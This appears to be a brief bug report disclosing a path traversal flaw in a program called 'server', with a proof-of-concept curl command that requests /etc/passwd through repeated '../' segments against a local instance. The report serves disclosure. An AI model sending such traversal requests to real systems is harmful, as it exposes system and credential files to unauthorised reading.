# Problem The program fails to handle user's URL input correctly, resulting in path traversal. # Proof of Concept - run `./server 8000` - `curl --path-as-is http://127.0.0.1:8000/../../../../../../etc/passwd`